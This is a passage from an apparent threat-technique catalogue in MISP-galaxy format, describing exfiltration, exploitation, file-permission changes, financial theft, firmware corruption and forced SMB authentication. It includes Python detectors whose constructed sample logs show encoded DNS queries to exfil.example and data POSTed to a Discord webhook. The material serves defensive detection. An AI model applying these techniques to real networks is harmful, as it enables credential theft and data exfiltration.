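            continue
        host = re.sub(r"^https?://", "", url, flags=re.I).split("/")[0].lower()
        t = totals.setdefault((client, host), {"client": client, "host": host, "posts": 0, "bytes_out": 0})
        t["posts"] += 1
        t["bytes_out"] += int(size)
    return list(totals.values())


# Constructed sample lines: ordinary CDN lookups, six encoded TXT queries to one
# zone, one webhook conversation and unrelated API traffic.
SAMPLE_DNS = [
    "2024-01-01T10:00:00 10.0.0.5 www.cdn.example A",
    "2024-01-01T10:00:01 10.0.0.5 static.cdn.example A",
    "2024-01-01T10:00:02 10.0.0.7 www.cdn.example A",
    "2024-01-01T10:01:00 10.0.0.5 aGVsbG8gd29ybGQgdGhpcyBpcyBh.exfil.example TXT",
    "2024-01-01T10:01:01 10.0.0.5 c2VjcmV0IGRhdGEgY2h1bmsgMDAx.exfil.example TXT",
    "2024-01-01T10:01:02 10.0.0.5 dGhpcmQgY2h1bmsgb2YgdGhlIGZp.exfil.example TXT",
    "2024-01-01T10:01:03 10.0.0.5 bGUgYmVpbmcgZXhmaWx0cmF0ZWQh.exfil.example TXT",
    "2024-01-01T10:01:04 10.0.0.5 ZmlmdGggY2h1bmsgZ29lcyBoZXJl.exfil.example TXT",
    "2024-01-01T10:01:05 10.0.0.5 bGFzdCBjaHVuayBvZiBkYXRhIDAw.exfil.example TXT",
]
SAMPLE_PROXY = [
    "2024-01-01T10:02:00 10.0.0.5 GET https://discord.com/ 120",
    "2024-01-01T10:02:05 10.0.0.5 POST https://discord.com/api/webhooks/000000/PLACEHOLDER_TOKEN 204800",
    "2024-01-01T10:02:09 10.0.0.5 POST https://discord.com/api/webhooks/000000/PLACEHOLDER_TOKEN 153600",
    "2024-01-01T10:02:12 10.0.0.7 POST https://api.github.com/repos/org/repo/issues 900",
]

if __name__ == "__main__":
    for z in analyze_dns(SAMPLE_DNS):
        print(f"DNS zone {z['zone']}: {z['encoded_hits']} encoded labels from {sorted(z['clients'])}")
    for t in analyze_proxy(SAMPLE_PROXY):
        print(f"{t['client']} POSTed {t['bytes_out']} bytes in {t['posts']} requests to {t['host']}")
```

On the sample data only exfil.example is flagged (six encoded labels from one client) and only the two webhook POSTs from 10.0.0.5 are totalled; the GET to discord.com and the GitHub API call are ignored. The webhook check is deliberately allow-list shaped: because the traffic is HTTPS and the host is a legitimate SaaS service, as the entry notes, the URL path and the direction and volume of the transfer are what remain visible to a proxy.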

The tag is: misp-galaxy:technique="Exfiltration Over Webhook"

Exfiltration to Cloud Storage

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

The tag is: misp-galaxy:technique="Exfiltration to Cloud Storage"

Exfiltration to Code Repository

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs is often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

The tag is: misp-galaxy:technique="Exfiltration to Code Repository"

Exfiltration to Text Storage Sites

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://app.tidalcyber.com/technique/ec2a76e6-3530-43e1-9e80-686e4b214ac8)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.<sup>[[Pastebin EchoSec](https://app.tidalcyber.com/references/3fc422e5-9a1d-5ac4-8e65-1df13d8a688e)]</sup>

Note: This is distinct from [Exfiltration to Code Repository](https://app.tidalcyber.com/technique/c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1), which highlights access to code repositories via APIs.

The tag is: misp-galaxy:technique="Exfiltration to Text Storage Sites"

Exfiltration Over Web Service

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:technique="Exfiltration Over Web Service"

Exploitation for Client Execution

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so these applications are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) and [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

The tag is: misp-galaxy:technique="Exploitation for Client Execution"

Exploitation for Credential Access

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.<sup>[[Technet MS14-068](https://app.tidalcyber.com/references/db78c095-b7b2-4422-8473-49d4a1129b76)]</sup><sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup> Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don’t properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.<sup>[[Bugcrowd Replay Attack](https://app.tidalcyber.com/references/ed31056c-23cb-5cb0-9b70-f363c54b27f7)]</sup><sup>[[Comparitech Replay Attack](https://app.tidalcyber.com/references/a9f0b569-8f18-579f-bf98-f4f9b93e5524)]</sup><sup>[[Microsoft Midnight Blizzard Replay Attack](https://app.tidalcyber.com/references/5af0008b-0ced-5d1d-bbc9-6c9d60835071)]</sup>

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.<sup>[[Storm-0558 techniques for unauthorized email access](https://app.tidalcyber.com/references/74fd79a9-09f7-5149-a457-687a1e2989de)]</sup>

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

The tag is: misp-galaxy:technique="Exploitation for Credential Access"

Exploitation for Defense Evasion

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries,<sup>[[Salesforce zero-day in facebook phishing attack](https://app.tidalcyber.com/references/cbd360bb-f4b6-5326-8861-b05f3a2a8737)]</sup> evade security logs,<sup>[[Bypassing CloudTrail in AWS Service Catalog](https://app.tidalcyber.com/references/de50bd67-96bb-537c-b91d-e541a717b7a1)]</sup> or deploy hidden infrastructure.<sup>[[GhostToken GCP flaw](https://app.tidalcyber.com/references/3f87bd65-4194-5be6-93a1-acde6eaef547)]</sup>

The tag is: misp-galaxy:technique="Exploitation for Defense Evasion"

Exploitation for Privilege Escalation

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) or [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f).

The tag is: misp-galaxy:technique="Exploitation for Privilege Escalation"

Exploitation of Remote Services

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://app.tidalcyber.com/technique/5bab1234-8d1e-437f-88a0-d527b2dfc6cd) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB <sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup> and RDP <sup>[[NVD CVE-2017-0176](https://app.tidalcyber.com/references/82602351-0ab0-48d7-90dd-f4536b4d009b)]</sup> as well as applications that may be used within internal networks such as MySQL <sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup> and web server services.<sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup>

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:technique="Exploitation of Remote Services"

Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.<sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup><sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup><sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup> Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.<sup>[[Mandiant Fortinet Zero Day](https://app.tidalcyber.com/references/7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7)]</sup><sup>[[Wired Russia Cyberwar](https://app.tidalcyber.com/references/28c53a97-5500-5bfb-8aac-3c0bf94c2dfe)]</sup>

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.<sup>[[OWASP Top 10](https://app.tidalcyber.com/references/c6db3a77-4d01-4b4d-886d-746d676ed6d0)]</sup><sup>[[CWE top 25](https://app.tidalcyber.com/references/d8ee8b1f-c18d-48f3-9758-6860cd31c3e3)]</sup>

The tag is: misp-galaxy:technique="Exploit Public-Facing Application"

External Remote Services

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) and [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) can also be used externally.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup>

Access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup> Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.<sup>[[Trend Micro Exposed Docker Server](https://app.tidalcyber.com/references/05c8909c-749c-4153-9a05-173d5d7a80a9)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>

The tag is: misp-galaxy:technique="External Remote Services"

Fallback Channels

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

The tag is: misp-galaxy:technique="Fallback Channels"

File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.<sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup> Custom tools may also be used to gather file and directory information and interact with the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560). Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

The tag is: misp-galaxy:technique="File and Directory Discovery"

Linux and Mac File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).

Adversaries may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

The tag is: misp-galaxy:technique="Linux and Mac File and Directory Permissions Modification"

Windows File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).<sup>[[Microsoft DACL May 2018](https://app.tidalcyber.com/references/32a250ca-a7eb-4d7f-af38-f3e6a09540e2)]</sup> Similar to a standard ACL, DACLs identify the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.<sup>[[Microsoft Access Control Lists May 2018](https://app.tidalcyber.com/references/2aeda95a-7741-4a74-a5a4-29a9e7a89451)]</sup>

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).

The tag is: misp-galaxy:technique="Windows File and Directory Permissions Modification"

File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.<sup>[[new_rust_based_ransomware](https://app.tidalcyber.com/references/8206240f-c84e-442e-b025-f629e9cc8d91)]</sup><sup>[[bad_luck_blackcat](https://app.tidalcyber.com/references/0d1e9635-b7b6-454b-9482-b1fc7d33bfff)]</sup><sup>[[falconoverwatch_blackcat_attack](https://app.tidalcyber.com/references/9d0ff77c-09e9-4d58-86f4-e2398f298ca9)]</sup><sup>[[blackmatter_blackcat](https://app.tidalcyber.com/references/605b58ea-9544-49b8-b3c8-0a97b2b155dc)]</sup><sup>[[fsutil_behavior](https://app.tidalcyber.com/references/07712696-b1fd-4704-b157-9e420840fb2c)]</sup>

The tag is: misp-galaxy:technique="File and Directory Permissions Modification"

Financial Theft

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,<sup>[[FBI-ransomware](https://app.tidalcyber.com/references/54e296c9-edcc-5af7-99be-b118da29711f)]</sup> business email compromise (BEC) and fraud,<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> "pig butchering,"<sup>[[wired-pig butchering](https://app.tidalcyber.com/references/dc833e17-7105-5790-b30b-b4fed7fd2d2f)]</sup> bank hacking,<sup>[[DOJ-DPRK Heist](https://app.tidalcyber.com/references/c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac)]</sup> and exploiting cryptocurrency networks.<sup>[[BBC-Ronin](https://app.tidalcyber.com/references/8e162e39-a58f-5ba0-9a8e-101d4cfa324c)]</sup>

Adversaries may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) to conduct unauthorized transfers of funds.<sup>[[Internet crime report 2022](https://app.tidalcyber.com/references/ef30c4eb-3da3-5c7b-a304-188acd2f7ebc)]</sup> In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) <sup>[[NYT-Colonial](https://app.tidalcyber.com/references/58900911-ab4b-5157-968c-67fa69cc122d)]</sup> and [Exfiltration](https://app.tidalcyber.com/tactics/66249a6d-be4e-43ab-a295-349d03a98023) of data, followed by threatening public exposure unless payment is made to the adversary.<sup>[[Mandiant-leaks](https://app.tidalcyber.com/references/aecc3ffb-c524-5ad9-b621-7228f53e27c3)]</sup>

Due to the potentially immense business impact of financial theft, an adversary may exploit the appearance of financial theft and monetary motives to divert attention from their true goals, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and business disruption.<sup>[[AP-NotPetya](https://app.tidalcyber.com/references/7f1af58a-33fd-538f-b092-789a8776780c)]</sup>

The tag is: misp-galaxy:technique="Financial Theft"

Firmware Corruption

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.<sup>[[Symantec Chernobyl W95.CIH](https://app.tidalcyber.com/references/a35cab17-634d-4a7a-a42c-4a4280e8785d)]</sup> Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.<sup>[[dhs_threat_to_net_devices](https://app.tidalcyber.com/references/f1d16045-d365-43d2-bc08-65ba1ddbe0fd)]</sup><sup>[[cisa_malware_orgs_ukraine](https://app.tidalcyber.com/references/ebe89b36-f87f-4e09-8030-a1328c0b8683)]</sup> Depending on the device, this attack may also result in [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34).

The tag is: misp-galaxy:technique="Firmware Corruption"

Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. <sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. <sup>[[Didier Stevens WebDAV Traffic](https://app.tidalcyber.com/references/b521efe2-5c1c-48c5-a2a9-95da2367f537)]</sup> <sup>[[Microsoft Managing WebDAV Security](https://app.tidalcyber.com/references/eeb7cd82-b116-4989-b3fa-968a23f839f3)]</sup>

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)), or place a specially crafted file on a navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user’s system accesses the untrusted resource it will attempt authentication and send information, including the user’s hashed credentials, over SMB to the adversary-controlled server.<sup>[[GitHub Hashjacking](https://app.tidalcyber.com/references/d31f6612-c552-45e1-bf6b-889fe619ab5f)]</sup> With access to the credential hash, an adversary can perform off-line [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) cracking to gain access to plaintext credentials.<sup>[[Cylance Redirect to SMB](https://app.tidalcyber.com/references/32c7626a-b284-424c-8294-7fac37e71336)]</sup>
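The network side of this behavior is what a defender can see: a workstation opening SMB to an address outside the organisation. The detector below is an added example (not from the page or any cited report) that runs over constructed firewall log lines in a simplified key=value format and flags outbound SMB from internal ranges to external hosts; the internal ranges and the log field names are assumptions.

```python
"""Flag outbound SMB from internal hosts to external addresses in firewall
logs, the traffic pattern a forced SMB authentication produces.
Example code added for illustration; log format and ranges are constructed."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumption: the organisation's internal address space is RFC 1918.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# SMB over TCP (445) and NetBIOS session service (139). WebDAV fallback runs
# over 80/443 and cannot be separated from ordinary web traffic by port alone.
SMB_PORTS = {445, 139}


def is_internal(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line: str) -> dict:
    """Parse a 'key=value key=value ...' line into a dict of strings."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def outbound_smb_to_external(lines):
    """Return {src_ip: sorted external dst_ips} for every flagged SMB flow.

    Denied connections are flagged as well: a blocked attempt still shows that
    the client was induced to authenticate to an outside host.
    """
    hits = defaultdict(set)
    for line in lines:
        f = parse_line(line)
        if f.get("proto") != "tcp":
            continue
        try:
            dport = int(f["dport"])
            src, dst = f["src"], f["dst"]
        except (KeyError, ValueError):
            continue  # malformed or incomplete record
        if dport in SMB_PORTS and is_internal(src) and not is_internal(dst):
            hits[src].add(dst)
    return {src: sorted(dsts) for src, dsts in hits.items()}


# Constructed sample log; 198.51.100.0/24 is a documentation-only range.
SAMPLE_LOG = [
    "ts=2024-01-01T09:00:01Z action=allow proto=tcp src=10.0.5.23 dst=10.0.1.10 dport=445",
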